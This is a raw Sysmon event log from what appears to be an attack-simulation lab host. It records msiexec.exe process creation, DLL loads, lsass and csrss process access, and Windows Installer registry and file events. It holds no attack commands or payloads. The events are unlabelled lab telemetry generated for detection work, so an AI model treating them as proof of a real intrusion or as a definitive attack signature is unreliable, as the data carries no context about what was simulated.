SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694791Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694790Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694789Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694788Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-EE55-62A8-0500-000000006202}3961060C:\Windows\system32\csrss.exe{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694787Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-981D-62AC-1A6B-000000006202}48404864C:\Windows\system32\msiexec.exe{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6f523|C:\Windows\System32\ADVAPI32.dll+189bf|C:\Windows\system32\Msi.dll+ba6c8|C:\Windows\system32\Msi.dll+16e294|C:\Windows\system32\Msi.dll+16e90c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 154100x80000000000000002694786Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.226{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\System32\MsiExec.exe -Embedding 466E8A9CB4048C63AEC990032FAEB6F6C:\Windows\system32\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /VNT AUTHORITY\SYSTEM 10341000x80000000000000002694785Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.209{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002694784Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.209{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 11241100x80000000000000002694783Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.209{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI559A.tmp2022-06-17 15:05:10.209NT AUTHORITY\SYSTEM 13241300x80000000000000002694782Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:10.194{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SequenceDWORD (0x00000001)NT AUTHORITY\SYSTEM 12241200x80000000000000002694781Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.194{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 13241300x80000000000000002694780Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:10.194{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHashBinary DataNT AUTHORITY\SYSTEM 13241300x80000000000000002694779Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:10.194{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\OwnerBinary DataNT AUTHORITY\SYSTEM 12241200x80000000000000002694778Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.194{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002694777Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.194{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 10341000x80000000000000002694776Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.194{7CF983DC-981D-62AC-1A6B-000000006202}48403576C:\Windows\system32\msiexec.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\apphelp.dll+20ffd|C:\Windows\system32\apphelp.dll+209c1|C:\Windows\system32\Msi.dll+19fdbd|C:\Windows\system32\Msi.dll+2ea9e|C:\Windows\system32\Msi.dll+474f5|C:\Windows\system32\Msi.dll+10b3b5|C:\Windows\system32\Msi.dll+10a5d6|C:\Windows\system32\Msi.dll+f4b9f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694775Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.194{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\fusion.dll4.8.3761.0 built by: NET48REL1Assembly managerMicrosoft® .NET FrameworkMicrosoft Corporationfusion.dllMD5=2A73BA7551F7B631AA484CAABD372F06,SHA256=F876EEEC603221DCDD098D1E2A1118012254E9C67851E749DF61D573EA949F55trueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002694774Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.194{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002694773Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.194{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 254200x80000000000000002694772Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.194{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5145.msi2022-06-13 14:04:24.0002022-06-17 15:05:10.194NT AUTHORITY\SYSTEM 10341000x80000000000000002694771Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.194{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002694770Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.194{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 11241100x80000000000000002694769Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.194{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5145.msi2022-06-17 15:05:10.194NT AUTHORITY\SYSTEM 23542300x80000000000000002694768Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.194{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5145.msiMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855falsetrue 11241100x80000000000000002694767Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.194{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5145.msi2022-06-17 15:05:10.194NT AUTHORITY\SYSTEM 10341000x80000000000000002694765Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694764Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694763Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694762Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694761Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694760Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694759Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694758Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694757Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694756Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.178{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-306B-000000006202}4688c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694755Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 